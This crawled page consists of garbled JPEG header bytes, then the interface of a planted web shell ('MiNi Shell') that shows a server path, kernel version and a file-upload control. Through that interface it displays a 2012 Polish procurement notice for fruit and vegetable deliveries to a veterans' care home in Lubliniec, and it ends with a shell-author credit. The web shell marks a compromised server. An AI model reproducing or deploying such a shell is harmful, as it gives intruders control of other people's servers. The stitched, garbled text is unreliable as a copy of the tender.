JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/112501-N-2012.html

<p class="kh_header"><b>Lubliniec: Sprzedaż wraz z sukcesywną dostawą warzyw i owoców na rzecz Domu Pomocy Społecznej Dom Kombatanta  im. św. Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr E. Cyrana 10.</b><br>
<b>Numer ogłoszenia: 112501 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Dom Kombatanta" im. św. Rafała Kalinowskiego , ul. Cyrana 10, 42-700 Lubliniec, woj. śląskie, tel. 034 3564004, faks 034 3564192.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna nie mająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z sukcesywną dostawą warzyw i owoców na rzecz Domu Pomocy Społecznej Dom Kombatanta  im. św. Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr E. Cyrana 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi sprzedaż wraz z sukcesywną dostawą warzyw i owoców na rzecz Domu Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego z siedzibą w Lublińcu, ul. dr E. Cyrana 10. Zakres zamówienia podano w załączniku nr 2 do SIWZ. 
	ZADANIE NR 1			
	Arbuz	kg	1 kg	50
	Banan gat. I (długość 15-18cm)	kg	1 kg	200
	Brokuły	szt	1 szt	100
	Brukselka	kg	1 kg	50
	Brzoskwinia	kg	1 kg	60
	Burak czerwony	kg	1 kg	700
	Cebula	kg	1 kg	300
	Cukinia	kg	1 kg	150
	Cytryna	kg	1 kg	20
	Czereśnie	kg	1 kg	40
	Czosnek	szt	1 szt	20
	Fasola sucha	kg	1 kg	40
	Fasola szparagowa	kg	1 kg	100
	Grapefruit	kg	1 kg	50
	Groch łuskany	kg	1 kg	40
	Gruszki	kg	1 kg	60
	Jabłka sortowane śr 7-8 cm	kg	1 kg	400
	Jabłka kompotowe	kg	1 kg	1 500
	Kalafior średnica 15-20cm	szt	1 szt	100
	Kalarepa	kg	1 kg	80
	Kapusta biała	kg	1 kg	700
	Kapusta czerwona	kg	1 kg	150
	Kapusta kiszona	kg	1 kg	900
	Kapusta pekińska	kg	1 kg	200
	Kapusta włoska	kg	1 kg	70
	Kiwi	szt	1 szt	200
	Koperek zielony	p	1p	500
	Mandarynka	kg	1 kg	70
	Marchew konsumpcyjna gat. I	kg	1 kg	1 800
	Mieszanka owoców suszonych	kg	1 kg	10
	Nektaryna	kg	1 kg	50
	Ogórek kiszony	kg	1 kg	300
	Ogórki zielone	kg	1 kg	150
	Papryka czerwona	kg	1 kg	60
	Pieczarki	kg	1 kg	130
	Pietruszka	kg	1 kg	150
	Pietruszka zielona	p	1p	800
	Pomarańcza	kg	1 kg	100
	Pomidory śr. 5-7 cm	kg	1 kg	600
	Por	kg	1 kg	20
	Porzeczka	kg	1 kg	20
	Rabarbar	kg	1 kg	60
	Rzodkiewka	p	1p	100
	Rzodkiew biała	kg	1 kg	200
	Sałata zielona	szt	1 szt	300
	Seler	kg	1 kg	300
	Szpinak	kg	1 kg	100
	Szczypiorek	p	1p	150
	Śliwki	kg	1 kg	100
	Truskawki	kg	1 kg	30
	Wiśnie	kg	1 kg	50
	Winogrona	kg	1 kg	30
	
ZADANIE NR 2			
	Ziemniaki konsumpcyjne	kg	1 kg	 15000.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.21.21.00-1, 03.21.22.13-6, 03.22.11.00-7, 03.22.11.10-0, 03.22.11.12-4, 03.22.11.13-1, 03.22.11.14-8, 03.22.12.00-8, 03.22.12.12-5, 03.22.12.22-8, 03.22.12.30-7, 03.22.13.00-9, 03.22.13.10-2, 03.22.13.40-1, 03.22.14.20-6, 03.22.14.10-3, 03.22.12.60-6, 03.22.12.70-9, 03.22.12.40-0, 03.22.21.11-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający ocenia ten warunek na podstawie złożonego przez Wykonawcę 
w postępowaniu oświadczenia stanowiącego załącznik nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie o spełnianiu warunków udziału w postępowaniu wypełnione i podpisane 
    przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy - załącznik nr 6 do 
    SIWZ;
2. oświadczenie o braku zaległości wobec właściwego Urzędu Skarbowego oraz właściwego   
    oddziału Zakładu Ubezpieczeń Społecznych podpisane przez osoby/ę upoważnione/ą do 
    reprezentowania Wykonawcy - załącznik nr 3 do SIWZ. 
3. Wypełniony i podpisany przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy 
    formularz oferty - według wzoru stanowiącego załącznik nr 1 do SIWZ.
4. Wypełniona i podpisana przez osoby/ę upoważnione/ą do reprezentowania Wykonawcy 
    kalkulacja ofertowa - według wzoru stanowiącego załącznik nr 2 do SIWZ.
5. W przypadku gdy Wykonawca upoważnia do reprezentowania w postępowaniu inną 
     osobę stosowne pełnomocnictwo z wyszczególnieniem zakresu upoważnienia.
6. Wykonawcy mogą wspólnie ubiegać się o zamówienie na zasadach określonych
           w art. 23 ustawy Prawo zamówień publicznych. W takim przypadku oferta musi 
           spełniać następujące warunki:
a)	wraz z ofertą winna być przedłożona kopia umowy lub inny dokument potwierdzający zawarcie konsorcjum/ spółki cywilnej, podpisane przez wszystkich partnerów, przy czym termin, na jaki została zawarta umowa konsorcjum, nie może być krótszy niż termin realizacji zamówienia,
b)	oferta winna być podpisana przez każdego partnera lub upoważnionego przedstawiciela (partnera wiodącego),
c)	upoważnienie do pełnienia funkcji przedstawiciela/partnera wiodącego wymaga podpisu prawnie upoważnionych przedstawicieli każdego z partnerów - należy załączyć je do oferty,
d)	przedstawiciel/partner wiodący winien być upoważniony do zaciągania zobowiązań 
i płatności w imieniu każdego na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu - do oferty należy dołączyć oświadczenie,
e)	podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za nie wykonanie lub nienależyte wykonanie zobowiązań.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo dopuszczenia zmian w umowie w przypadku
      a) wszelkie  zmiany  postanowień  umowy  mogą nastąpić jedynie w zakresie określonym 
          w art. 144 ustawy Prawo zamówień publicznych i wymagają zachowania formy 
          pisemnego aneksu pod rygorem nieważności.
	b) w przypadku zmiany ustawowej stawki VAT strony przewidują możliwość zmiany   
         wynagrodzenia o wysokość podaną w obowiązujących przepisach prawa.
	c) zmiany terminu realizacji umowy.
    d) gdy zmiany będą korzystne dla Zamawiającego i nie będą: 
    - wprowadzone nowe warunki, które gdyby zostały ujęte w ramach procedury 
       przetargowej udzielenie zamówienia uniemożliwiłoby dopuszczenie innych ofert niż ta 
       która została pierwotnie dopuszczona. 
    - modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który
      nie był przewidziany w postanowieniach pierwotnego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lubliniec.starostwo.bip.info.pl/index.php?idmp=335&r=o<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych Warunków Zamówienia można odebrać nieodpłatnie w siedzibie DPS Dom Kombatanta            w Lublińcu przy ul. dr E. Cyrana 10, pok. Nr 27 w godz od 7:00 do 15:00 od pon. do piąt.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 10:45, miejsce: Dom Pomocy Społecznej Dom Kombatanta im. św. Rafała Kalinowskiego 
             z siedzibą w Lublińcu, ul. dr E. Cyrana 10, sekretariat pok. Nr 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg	1 kg	50
Banan gat. I (długość 15-18cm)	kg	1 kg	200
Brokuły	szt	1 szt	100
Brukselka	kg	1 kg	50
Brzoskwinia	kg	1 kg	60
Burak czerwony	kg	1 kg	700
Cebula	kg	1 kg	300
Cukinia	kg	1 kg	150
Cytryna	kg	1 kg	20
Czereśnie	kg	1 kg	40
Czosnek	szt	1 szt	20
Fasola sucha	kg	1 kg	40
Fasola szparagowa	kg	1 kg	100
Grapefruit	kg	1 kg	50
Groch łuskany	kg	1 kg	40
Gruszki	kg	1 kg	60
Jabłka sortowane śr 7-8 cm	kg	1 kg	400
Jabłka kompotowe	kg	1 kg	1 500
Kalafior średnica 15-20cm	szt	1 szt	100
Kalarepa	kg	1 kg	80
Kapusta biała	kg	1 kg	700
Kapusta czerwona	kg	1 kg	150
Kapusta kiszona	kg	1 kg	900
Kapusta pekińska	kg	1 kg	200
Kapusta włoska	kg	1 kg	70
Kiwi	szt	1 szt	200
Koperek zielony	p	1p	500
Mandarynka	kg	1 kg	70
Marchew konsumpcyjna gat. I	kg	1 kg	1 800
Mieszanka owoców suszonych	kg	1 kg	10
Nektaryna	kg	1 kg	50
Ogórek kiszony	kg	1 kg	300
Ogórki zielone	kg	1 kg	150
Papryka czerwona	kg	1 kg	60
Pieczarki	kg	1 kg	130
Pietruszka	kg	1 kg	150
Pietruszka zielona	p	1p	800
Pomarańcza	kg	1 kg	100
Pomidory śr. 5-7 cm	kg	1 kg	600
Por	kg	1 kg	20
Porzeczka	kg	1 kg	20
Rabarbar	kg	1 kg	60
Rzodkiewka	p	1p	100
Rzodkiew biała	kg	1 kg	200
Sałata zielona	szt	1 szt	300
Seler	kg	1 kg	300
Szpinak	kg	1 kg	100
Szczypiorek	p	1p	150
Śliwki	kg	1 kg	100
Truskawki	kg	1 kg	30
Wiśnie	kg	1 kg	50
Winogrona	kg	1 kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.21.22.13-6, 03.22.11.00-7, 03.22.11.10-0, 03.22.11.12-4, 03.22.11.13-1, 03.22.11.14-8, 03.22.12.00-8, 03.22.12.12-5, 03.22.12.22-8, 03.22.12.30-7, 03.22.12.60-6, 03.22.12.70-9, 03.22.12.40-0, 03.22.13.40-1, 03.22.13.00-9, 03.22.13.10-2, 03.22.14.20-6, 03.22.14.10-3, 03.22.21.11-4, 03.22.22.10-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki konsumpcyjne	kg	1 kg	15000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com